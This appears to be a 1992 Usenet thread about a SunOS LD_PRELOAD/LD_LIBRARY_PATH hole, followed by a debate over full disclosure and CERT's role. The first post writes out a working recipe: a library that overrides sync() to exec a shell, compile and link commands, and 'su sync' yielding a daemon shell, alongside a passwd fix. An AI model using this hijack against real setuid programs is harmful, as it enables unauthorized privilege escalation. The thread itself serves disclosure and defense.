that sun env var thing -- it's the old LD_LIBRARY_PATH thing right?

Post by Rob J. Nau » Sat, 30 May 1992 19:33:50




Quote:

>Again the CERT advisory fails to inform as much as it could... that Sun
>environment variable thing.. it's just ld.so with relative path names in -L
>options right, the one we've known about in alt.security for a year or two?  Or
>has something worse been discovered?

Not the relative pathnames, but alternative paths/libraries with the
LD_LIBRARY_PATH or LD_PRELOAD variables (the last one is undocumented).

Make a file 'sync.c'
  sync() {
        execl("/bin/sh","sh",0);
  }

then type:
  brasaap% cc -c -O -R -pic sync.c
  brasaap% ld -o buglib.so.1.1 -assert pure-text sync.o
  brasaap% setenv LD_PRELOAD ./buglib.so.1.1
  brasaap% su sync
  $ id
uid=1(daemon) gid=1(daemon) groups=1

Instead of 'su sync' you can also use 'login -p sync'.
FIX: change /etc/passwd to:
  sync::65533:65533::/:/bin/sync

SUN has fixed this not by fixing ld.so, but by fixing a few UNIX commands
that are setuid and exec normal programs (su, login, sendmail).
Other setuid programs that exec normal programs should beware of this,
and either setuid back before exec(), or clear LD_LIBRARY_PATH and
LD_PRELOAD before exec().

Quote:

>thanks for any info,
>ajr

I don't know what took them so long, I knew this last year, the owner
of this machine complained about this in January or February to Sun.
It's a shame that it seems now it's not permitted to discuss any UNIX
bugs as soon as they have an impact on security. CERT is more like a
black hole nowadays, with all our mail and news going in, and only
crappy vendor advisories and general textfiles that don't go beyond
'check your hosts.equiv for a "+"'.

Rob
--

                    /~~~~~~~~~~~~~~~~~~~~~~~~~~\                A/~~\A
                    | - From the keyboard of - |               ((o  o))___    
                    |      Rob J. Nauta        |                 \  /     ~~~

----#---x---x---x---|   Phone: +31-40-833777   |--#---x---x---x---x---x---#---
    #               \--------------------------/  #                    \  #  
----#---x---x---x---x--| |--#---x---x---x-| |--x--#---x---x---x---x---x---#---
    #)( \\|  /*\/|((   | | )#(//  \\)(/  \| |(// \#(//  \|/   \\)|(/   \|)#(/

 
 
 

Post by Wietse Vene » Sun, 31 May 1992 03:51:11



Quote:

>I don't know what took them so long, I knew this last year, the owner
>of this machine complained about this in January or February to Sun.
>It's a shame that it seems now it's not permitted to discuss any UNIX
>bugs as soon as they have an impact on security. CERT is more like a
>black hole nowadays, with all our mail and news going in, and only
>crappy vendor advisories and general textfiles that don't go beyond
>'check your hosts.equiv for a "+"'.

I (the owner of "this" machine) disagree. Openly discussing security
holes before a fix is available only helps the intruders. Both CERT and
Sun worked very * this problem and on other problems I reported
in the past.  The LD_ problem was particularly difficult because there
is no general fix, except statically linking every executable.

I also take exception to the statement that CERT is a black hole.  It
is not CERT's job to fix holes.  Whenever a fix becomes available, CERT
has to decide how much information can be given away without bringing
systems at risk. CERT certainly doesn't have to hand out recipes for
how to exploit holes.

Followups to comp.security.misc. Alt.security is on its way out.

 
 
 
